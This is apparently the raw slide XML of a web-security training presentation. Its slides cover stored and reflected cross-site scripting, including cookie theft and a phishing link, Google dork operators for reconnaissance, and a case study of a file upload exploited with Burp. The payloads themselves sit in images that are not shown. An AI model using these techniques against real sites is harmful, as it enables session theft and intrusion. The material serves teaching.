          <a:xfrm>
            <a:off x="2036940" y="2170983"/>
            <a:ext cx="2461592"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C24A56ED-9BDC-478C-9786-2E34A42D89C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978606" y="5101108"/>
            <a:ext cx="2519926"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75645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687D86-2355-4744-930E-3D0457CEE6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874D8FD-A4C6-4A4A-8F93-61CB8AE0F442}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored Example – Stealing a Cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50466D0A-96F6-4DF0-B716-DA9EC7825EA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2263907" y="1399704"/>
            <a:ext cx="7664187" cy="3102722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25304F2D-F67D-4460-9FAB-3FFBC8D6F746}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4561479" y="2592336"/>
            <a:ext cx="1392060" cy="210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nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E295E04D-6C9A-4C65-BD66-78D7DAF9AB2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1160654" y="5021046"/>
            <a:ext cx="9870693" cy="628738"/>
            <a:chOff x="1160653" y="5021046"/>
            <a:chExt cx="9870693" cy="628738"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Picture 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31C7214F-4E6B-429F-A1A7-A635BB979318}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1181121" y="5021046"/>
              <a:ext cx="9850225" cy="628738"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F31BF3DB-2A48-4D7C-8B61-A8943ED364C8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9425027" y="5050863"/>
              <a:ext cx="1585852" cy="307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D9D49F96-B87C-42BF-9029-1D04A959EBE5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1160653" y="5304424"/>
              <a:ext cx="2894511" cy="307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13667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36F8F-A917-4332-9B2D-64367B50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A0C1F4D-141E-4EC0-9825-54796EF4E4EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reflected Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D95DCA6E-5154-4ABB-9CA0-6AE043FB2427}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="911087"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note: This would require getting a victim to click on a link or otherwise send this exact request, unlike stored attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B7FD898-A630-4496-AA0B-91712C46FE91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="557732" y="2199861"/>
            <a:ext cx="6477904" cy="1352739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACDA0307-28B3-4562-8991-ED1AB6C75888}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4693046" y="2847111"/>
            <a:ext cx="5727184" cy="2937463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{894760FD-E449-4316-BBD7-229122EC933C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5008740" y="3686050"/>
            <a:ext cx="666503" cy="294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8AD1AECA-C600-4D6E-B182-0B645E1C2F7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2533480" y="3659430"/>
            <a:ext cx="21595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Reflected Content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1F43E05-26FB-4BAF-A4B6-4FAA8EB39E9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2589331" y="5393047"/>
            <a:ext cx="7013338" cy="739319"/>
            <a:chOff x="2389888" y="5393047"/>
            <a:chExt cx="7013338" cy="739319"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77F45308-590D-4645-BE86-636AB24A531D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2449006" y="5703681"/>
              <a:ext cx="6954220" cy="428685"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCEFBDFA-2E8C-42FE-A6B6-8352A37C039B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2389888" y="5393047"/>
              <a:ext cx="16979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Phishing link:</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36691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51BB9-37B6-4BBE-93C6-5813753938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3EFBD19-50E2-4D84-B656-28E018604DCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modern Encyclopedia: The Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BD572DA-09ED-44E3-812E-FA680B9A6B27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1295400"/>
            <a:ext cx="11126632" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Google Dorks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>site:&lt;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&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -- Used to filter results by a particular site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>inurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:&lt;term&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -- Used to find URLs containing a keyword, like “admin”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>intitle:&lt;term&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -- Uses the site’s meta tag “title”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filetype:&lt;extension&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Archive.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can help find old versions of code or documentation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB4F10CC-A520-4A7C-BCFA-F62B110ED1EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="19936"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1131060" y="4950365"/>
            <a:ext cx="5466869" cy="1028789"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Chart&#10;&#10;Description automatically generated with low confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13545D0D-4214-4D80-A152-957F700EFB66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8327506" y="4049880"/>
            <a:ext cx="2515340" cy="1414880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Graphical user interface, text, application, chat or text message&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A04CB3F-E8F8-4B91-8461-4DFC44A8F868}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7629381" y="4954045"/>
            <a:ext cx="1769856" cy="1537140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1064226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103DA-77F0-4718-81B9-E8760B3291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95A758D1-DC40-44C0-9D70-F92B266ACA41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Real World Case Study</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{315E7674-727B-491C-98A3-40F8F4D3616C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="730317" y="2508057"/>
            <a:ext cx="7638431" cy="1206921"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9791E24-244D-4538-A230-05FE7BEA213B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="434050" y="1406220"/>
            <a:ext cx="6812870" cy="815411"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3BBF2D0-57E9-4DB4-89F4-A2F07D595D88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7302675" y="1311675"/>
            <a:ext cx="46204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Documentation told me I could upload a file that would be displayed on the login page, noted that for testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00E52003-08C9-4852-9A70-E6BB866385CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4882846" y="3012759"/>
            <a:ext cx="2641076" cy="307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2AAC1282-1944-4D64-AA88-AF003DE87D12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8368748" y="2523169"/>
            <a:ext cx="34985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Burp showed the GET request to the instructions file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8413D03F-CFDC-4544-9791-42B8E0E881AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="38001" t="32467" r="37262" b="35392"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1252331" y="3897056"/>
            <a:ext cx="2773018" cy="1837001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2358B6B-D723-4B7C-88D4-D50EFDE77287}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2630162" y="4984462"/>
            <a:ext cx="7146443" cy="1053300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{300EFFF1-E5D3-43BF-9A66-3F63F73CFFFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4025349" y="4572557"/>
            <a:ext cx="34985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Proof of Concept</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CCD9CA2-B8F1-44DB-AEC2-76EFD1056EA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6356933" y="1332293"/>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Recon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{011727D9-104A-41D0-8A64-A184DCE9DC13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7584698" y="249034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Burp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3190EFC3-3C3D-4A4D-8D85-FCCA40356FDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8553193" y="5668430"/>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Inspector</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1182998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A28F92-CF0A-4523-9274-33575B24AC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A97D4FD-5C10-4317-983D-ED27360661EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
